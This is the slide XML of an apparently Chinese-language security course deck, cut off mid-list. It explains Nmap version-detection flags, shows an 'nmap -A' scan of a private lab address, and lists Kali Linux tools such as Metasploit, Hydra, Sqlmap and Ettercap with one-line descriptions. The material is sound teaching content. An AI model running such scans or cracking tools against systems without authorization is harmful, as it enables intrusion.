                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3780186162"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="6379287">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3232206068"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="291505">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b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>服務和版本探索  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>see  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>7.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Service and Application Version Detection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>https://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="900" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>nmap.org/man/zh/man-version-detection.html</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="900" b="1" i="0" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1943540099"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="3204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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0" err="1">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>sV</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>版本探索</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>打開版本探索</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>。也</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>可以使用</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>-A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>同時打開操作進行系統探索和版本探索</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3852420281"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="274320">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>--</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>allports</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">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val="551007330"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="480060">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>--version-intensity &lt;intensity&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">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val="557071097"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="291505">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">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val="2722341419"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="2915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a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>--version-trace</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>打印出詳細的關於正在執行的掃描的調試信息。是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-TW" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>--packet-trace</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-TW" altLang="en-US" sz="1200" b="1" dirty="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>得到的子集。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290"/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="389784814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38</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30702064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9815" y="268377"/>
            <a:ext cx="5777544" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>nmap -A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0" smtClean="0"/>
              <a:t>192.168.56.1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="內容版面配置區 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="689957" y="1286575"/>
            <a:ext cx="7415800" cy="5463359"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1553065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184841"/>
            <a:ext cx="7772400" cy="1009432"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Kali Linux Tools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="767448"/>
            <a:ext cx="7772400" cy="5282292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" smtClean="0"/>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>網絡掃描工具，用於檢測主機和服務。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t> Framework</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>用於開發、測試和使用漏洞的框架。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>網絡封包分析工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>Aircrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>-ng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>用於測試和破解無線網絡的工具套件。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>John the Ripper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>用於密碼破解的工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>暴力破解工具，用於測試各種登入界面的密碼。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Burp Suite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>用於測試 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>應用程序的代理工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>一個開源的情報收集和連接分析工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Social Engineering Toolkit (SET)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>用於模擬社會工程學攻擊的工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>網絡封包分析器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>密碼恢復工具，支持多種加密算法。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>Nikto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>服務器漏洞掃描器。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>自動化 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>和資料庫測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Exploit Database (Exploit-DB)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>一個漏洞利用的數據庫。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>Maltego</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>一個用於收集和分析開源情報的工具。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Hping3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>網絡測試工具，支持 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t>UDP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>等協議。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0"/>
              <a:t>Ettercap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>中間人攻擊工具，用於監視、攔截和修改網絡流量。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1100" b="1" dirty="0" err="1"/>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
